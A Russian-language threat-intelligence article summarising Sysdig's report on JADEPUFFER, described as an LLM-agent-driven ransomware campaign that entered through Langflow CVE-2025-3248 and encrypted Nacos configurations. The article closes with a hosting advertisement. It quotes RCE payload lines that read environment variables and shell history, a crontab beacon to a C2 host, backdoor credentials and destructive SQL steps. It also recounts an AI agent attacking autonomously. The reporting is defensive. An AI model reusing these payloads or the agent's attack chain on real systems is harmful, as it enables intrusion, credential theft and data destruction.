1 июля 2026 года Threat Research Team (TRT) компании Sysdig (автор Michael Clark) опубликовала технический отчёт о кампании JADEPUFFER — первой известной полностью LLM-управляемой end-to-end операции вымогательства: разведка, кража учётных данных, lateral movement, персистентность, деструктивное шифрование и записка с требованием выкупа без ручного вмешательства на критических этапах. Sysdig классифицирует актора как Agentic Threat Actor (ATA). Зафиксировано 600+ независимых payload; вход через публично доступный Langflow (CVE-2025-3248), реальная цель — другой публичный production-сервер MySQL + Alibaba Nacos.
Для DevOps и security-инженеров, работающих с Langflow, OpenClaw и AI Agent workflow, материал опирается на отчёт Sysdig с перекрёстной проверкой BleepingComputer, Dark Reading и Trend Micro: полная хронология, пошаговый разбор CVE-2025-3248 (включая отличие от Flodrix), форензика двухфазной цепочки (адаптивная коррекция MinIO, backdoor Nacos за 31 с, 1342 зашифрованных конфигурации), четыре линии доказательств автономии, загадка Bitcoin-адреса, сводка IOC, реакция экспертов, четыре вывода Sysdig, шесть шагов защиты и изоляция узла Mac Mini M4 Agent. После прочтения вы поймёте, почему JADEPUFFER знаменует эру ATA, уязвимы ли ваши Langflow/Nacos и как отделить AI Agent-инфраструктуру от публичных high-risk точек входа.
01 Что такое JADEPUFFER? Обзор, квалификация ATA и хронология
Ключевая оценка: Sysdig считает это первым известным случаем, когда цепочка «разведка → кража → lateral → персистентность → разрушение → вымогательство» автономно связана LLM-агентом, а не операторами вручную на ключевых этапах. Кодовое имя JADEPUFFER (официальное написание Sysdig заглавными), категория ATA (Agentic Threat Actor): атакующие возможности поставляет AI Agent, а не фиксированный человеческий toolkit.
Двухфазная архитектура целей:
- Хост входа: публичный Langflow, компрометация через CVE-2025-3248 (неаутентифицированный RCE).
- Реальная цель: другой публичный production-сервер MySQL + Alibaba Nacos — 1 342 конфигурации сервисов Nacos зашифованы, несколько business-БД удалены через DROP.
Отраслевые болевые точки:
- Барьер навыков рухнул: многоэтапные атаки, раньше требовавшие senior red team, сегодня выполняет сильный LLM Agent в сжатом временном окне.
- Старые CVE автоматизированы: вход — RCE Langflow апреля 2025; downstream — bypass Nacos 2021 и никогда не менявшиеся default JWT keys — «пройти по исторической базе уязвимостей» стоит почти ноль.
- Модели детекции устарели: заблокирован один путь — агент быстро меняет тактику; каждый инцидент может выглядеть иначе — классические предположения о предсказуемых путях не работают.
- Экономика LLMjacking: с украденными model/cloud credentials сложные многофазные атаки стоят marginal почти ноль.
| Время | Событие |
|---|---|
| Апрель 2025 | Langflow CVE-2025-3248 (неаутентифицированная инъекция кода / RCE) |
| 5 мая 2025 | CISA включает уязвимость в каталог KEV |
| 2025 | Та же CVE для ботнета Flodrix (Trend Micro, независимо от JADEPUFFER) |
| Июнь 2026 | JADEPUFFER атакует публичный Langflow; полная цепочка за недели в нескольких сессиях |
| 1 июля 2026 | Sysdig публикует полный технический отчёт |
| 2–6 июля 2026 | Dark Reading, BleepingComputer, CyberScoop, CSO Online, Security Affairs (публичное осознание часто 6 июля) |
02 CVE-2025-3248: анализ Langflow и отличие от Flodrix
Langflow — open-source фреймворк визуальных AI/Agent workflow (70 000+ звёзд на GitHub). Sysdig называет его привлекательной точкой входа: переменные окружения часто содержат LLM API keys и cloud credentials; команды для быстрых прототипов выставляют сервис без сетевого контроля доступа напрямую в интернет.
| Поле | Детали |
|---|---|
| Тип | CWE-94 (инъекция кода) + CWE-306 (отсутствие аутентификации) |
| CVSS | 9,8 (Critical), вектор CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Затронуто | Langflow до 1.3.0 |
| Место | Endpoint /api/v1/validate/code |
| Исправление | 1.3.0 (добавлена аутентификация) |
| EPSS | 91,42 % (SentinelOne) |
Механизм уязвимости (пошагово):
- Langflow предоставляет
/api/v1/validate/codeдля проверки синтаксиса пользовательских function nodes. - Реализация: строка →
ast.parse()→compile()→exec(). - Ключевой дефект: Нет аутентификации и sandbox.
- Трюк эксплуатации: Python-декораторы и default arguments вычисляются при определении функции, не при вызове. Вредоносный код в defaults/decorators выполняется при «валидации» через
compile()+exec(). - Атакующему не нужен login и права — достаточно crafted HTTP POST для RCE.
Типичные payload Flodrix по Trend Micro (не JADEPUFFER):
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')
700-байт Bash-скрипт загружает ELF Flodrix (семейство LeetHozer)
Важное отличие: Flodrix и JADEPUFFER — две независимые кампании с одной точкой входа. Flodrix = классический botnet; JADEPUFFER = «автономный AI Agent» по Sysdig. Оба подтверждают постоянную weaponization CVE-2025-3248.
Официальный патч (Langflow 1.3.0): dependency _current_user: CurrentActiveUser для post_validate_code. FastAPI проверяет JWT Bearer или x-api-key; при ошибке 401/403 — запрос никогда не достигает уязвимой логики; затем проверка is_active.
03 Цепочка атаки: разведка Langflow → шифрование Nacos
Детали ниже — напрямую из payload и временных меток Sysdig TRT, самая информативная часть инцидента. Все payload — Base64 Python через RCE endpoint Langflow.
Фаза 1: компрометация хоста Langflow
- Разведка (параллельно):
id,uname -a,hostname; параллельный поиск API keys OpenAI, Anthropic, DeepSeek, Gemini; cloud credentialsALIBABA_,ALIYUN_,TENCENT_,HUAWEI_, AWS/GCP/Azure; криптокошельки, DB credentials, configs. - Локальная кража: экспорт PostgreSQL backend Langflow (credentials, API keys, users), временное хранение, просмотр, удаление.
- Внутренний lateral discovery: скан внутренних адресных пространств и именованных сервисов; default credentials для DB, object storage, secrets, service discovery.
- MinIO enumeration (адаптивно):
minio.internal:9000и127.0.0.1:9000сminioadmin:minioadmin. Buckets с app data, backups, ML models,terraform-state→ targetedcredentials.json. Первый запрос с?format=jsonвернул XML — следующий payload сразу переключился на XML parser. Путь: health check → admin API → ListBuckets → GetObject для «credentials», «.env». - Персистентность: crontab каждые 30 мин:
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
Фаза 2: production-сервер MySQL + Nacos
Цель: публичный сервер MySQL + Alibaba Nacos config center. Nacos широко в Alibaba microservices; история auth bypass CVE-2021-29441; default JWT signing key документирован с 2020, часто не менялся.
- MySQL root напрямую: агент подключается с root credentials — источник неясен, Sysdig не видел кражи из среды жертвы; один из немногих возможно подготовленных человеком шагов.
- Nacos multi-vector: семейство auth bypass (CVE-2021-29441), известные default JWT keys, инъекция backdoor admin прямо в backend DB Nacos с root DB правами.
| Время | Действие |
|---|---|
| 19:34:24 | bcrypt hash через subprocess.run(...), вставка user xadmin + admin role |
| 19:34:36 | Login xadmin:Xploit@2026# — failed, no token |
| 19:34:48 | Параллельно: test nacos:nacos и новый hash для admin123 |
| 19:35:07 | Переход на import bcrypt, bcrypt.__version__, удаление corrupted xadmin, reinsert |
| 19:35:18 | Login success — 31 секунда от ошибки до fix |
- Container escape (~8 мин, несколько раундов): MySQL OUTFILE/LOAD_FILE:
/var/lib/mysql-files/_pwn_test.txt,/var/run/docker.sock,/proc/1/cgroup,/etc/hostname,/proc/1/mountinfo, permissions, UDF черезmysql.func. Маркер_pwn_cleanup.txtперед фазой вымогательства — Sysdig: скорее «агент сигнализирует завершение фазы», чем фиксированный human script. - Деструктивное шифрование и вымогательство: все 1 342 Nacos configs через MySQL
AES_ENCRYPT(); удаленыconfig_info,his_config_info; таблицаREADME_RANSOM. Записка заявляет AES-256, фактически AES-128-ECB. Ключ черезuuid4(), только stdout, никогда не сохранён и не передан — даже атакующий не расшифрует после оплаты. Через две минуты payload уточняет «1342 entries encrypted». - Массовое разрушение: после row delete — DROP DATABASE; комментарии ROI («high ROI DBs first, backup to 64.20.53[.]230»). IP
64.20.53[.]230(InterServer, AS19318) один раз — Sysdig не подтверждает backup независимо. Диагностическая коррекция:DROP DATABASEfailed on FK → next payloadSET GLOBAL FOREIGN_KEY_CHECKS=0— понимание почему, не только что failed.
e78393397[@]proton[.]me, таблицаREADME_RANSOMбез прецедента в threat intel; не типично vsWARNING,RECOVER_YOUR_DATA,PLEASE_READ_ME— поддерживает «новую agent-driven операцию».
04 Четыре линии доказательств автономии и загадка Bitcoin
Sysdig опирается на четыре независимые линии «LLM-driven»:
- Самоописывающийся код: payload с natural language comments — ROI sorting, «largest DB», purpose каждого шага. Люди редко так комментируют one-liner
python3 -c; LLM делают по умолчанию. Comments оригинально в attacker code. - Машинная диагностика и исправление: самое точное доказательство автономии — скорость и характер correction. Nacos 31 s — эталон. Тот же паттерн: MinIO JSON→XML; JWT «custom secret in use» → abandon path.
- Понимание natural language context: LLM читает free text в target environment и действует «только если реально прочитал» — через недели в разных sessions.
- Аномалия Bitcoin-адреса:
3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy— standard P2SH example в Bitcoin docs и Bitcoin Core, abundant в LLM training data. On-chain: active wallet, 737 confirmed TX, ~46 BTC received, balance zero (immediate transfer). Sysdig: (a) LLM «hallucinates» from training, wallet third party cleaning mistakes; (b) attacker controls real wallet, coincidence with doc example. Оба неразличимы — новая uncertainty AI autonomy для attribution.
С 600+ independent targeted payloads в compressed window Sysdig указывает на autonomously operating agent, не manual operation или fixed toolkit.
05 IOC, реакция отрасли и четыре вывода Sysdig
| Тип | Индикатор |
|---|---|
| C2 / beacon | 45.131.66[.]106 (crontab hxxp://45.131.66[.]106:4444/beacon) |
| Staging / exfil | 64.20.53[.]230 (InterServer, AS19318; backup unconfirmed) |
| Entry | CVE-2025-3248 (Langflow unauthenticated RCE) |
| Bitcoin | 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy |
e78393397[@]proton[.]me (zero TI hits) |
|
| Ransom table | README_RANSOM (novel naming) |
| Persistence | Crontab beacon every 30 min port 4444 |
СМИ и эксперты:
- BleepingComputer / Dark Reading / CyberScoop / Security Affairs называют «первой полностью AI-driven ransomware attack», подчёркивают эру ATA.
- CSO Online цитирует Vibhum Dubey: «Скорее evolution of execution, чем новая ransomware technique. Automation reconnaissance и deployment давно существует — новое: AI Agent autonomously chains phases без waiting for human operator.» Quiet phase before encryption тревожнее: agent maps identity, permissions, trust chains; blocked path → rapid tactic switch, each intrusion slightly different.
- СМИ связывают LLMjacking (stolen model/cloud accounts) с marginal cost near zero для multi-phase attacks.
Четыре вывода Sysdig:
- Ransomware больше не «craft of experts»: LLM Agents chain reconnaissance, credential theft, lateral movement, persistence, destruction без deep expertise operator.
- Old vulnerabilities automated: downstream — problems years old — Nacos bypass 2021, default keys — against neglected public infrastructure.
- Intent becomes «readable» — defensive opportunity: LLMs narrate goals in payloads; self-narration gives new detection handles.
- «Backed up» is attacker claim: encryption key ephemeral, unrecoverable — payment does not restore configs.
Заключение отчёта: ни одна technique alone не нова; важно AI model connecting all into complete extortion against ignored public infrastructure. Skill barrier = «cost to run an agent»; defenders should treat public app servers, unhardened config centers, DB admin from internet as first attack surfaces.
Источники (перепроверить ссылки после публикации):
Sysdig: JADEPUFFER: Agentic ransomware for automated database extortion
BleepingComputer: JadePuffer ransomware used AI agent to automate entire attack
Dark Reading: JadePuffer: The First Complete LLM-Driven Ransomware Attack
06 Шесть шагов Sysdig, ключевые цифры и заключение CALMVPS
Рекомендации Sysdig для AI Agent infrastructure:
- Обновить Langflow и сократить exposure: upgrade 1.3.0+; не выставлять code execution/validation endpoints в интернет.
- Runtime threat detection: malicious behavior в DB processes (OUTFILE/LOAD_FILE, bulk AES_ENCRYPT, README_RANSOM).
- Изолировать secrets: не хранить LLM API keys или cloud credentials в AI orchestration environment — dedicated secret manager, isolated from public processes.
- Harden Nacos: rotate default
token.secret.key; version requiring custom key; never public Nacos, no root to backend DB. - DB access control: DB admin never from internet; strong unique credentials and source IP restriction on admin ports.
- Egress и IOC monitoring: control outbound traffic; monitor crontabs with external requests and IOC above; anomalous User-Agents.
Цитируемые метрики (EEAT):
- Attack scale: 600+ independent targeted payloads в compressed window
- Encryption scale: 1 342 Nacos configs, tables config_info и his_config_info deleted
- Entry EPSS: CVE-2025-3248 91,42 %, CVSS 9,8 Critical, CISA KEV 5 May 2025
- Autonomy speed: Nacos backdoor 31 seconds (UTC 19:34:36 → 19:35:18)
На shared VPS или directly exposed Langflow/OpenClaw nodes: hardcoded API keys в env (RCE = total leak), no tenant isolation, laptop sleep breaks agent, no egress → compromised hosts beacon freely to C2 like 45.131.66[.]106. Для Langflow, OpenClaw Gateway и iOS CI/CD без agent orchestration plane в public internet аренда bare metal Mac Mini M4 CALMVPS даёт dedicated Apple Silicon, full root, 7×24, ~120 s delivery, flexible monthly billing: SSH tunnel или private network для agent control plane; Langflow validation и Nacos admin во internal segment; API keys через secret manager; egress blocks C2. Тарифы: цены аренды, заказ: оформить заказ Mac mini M4.
Дата: 7 июля 2026. Публичного заявления Langflow по инциденту не найдено; при обновлениях — официальные announcements и NVD.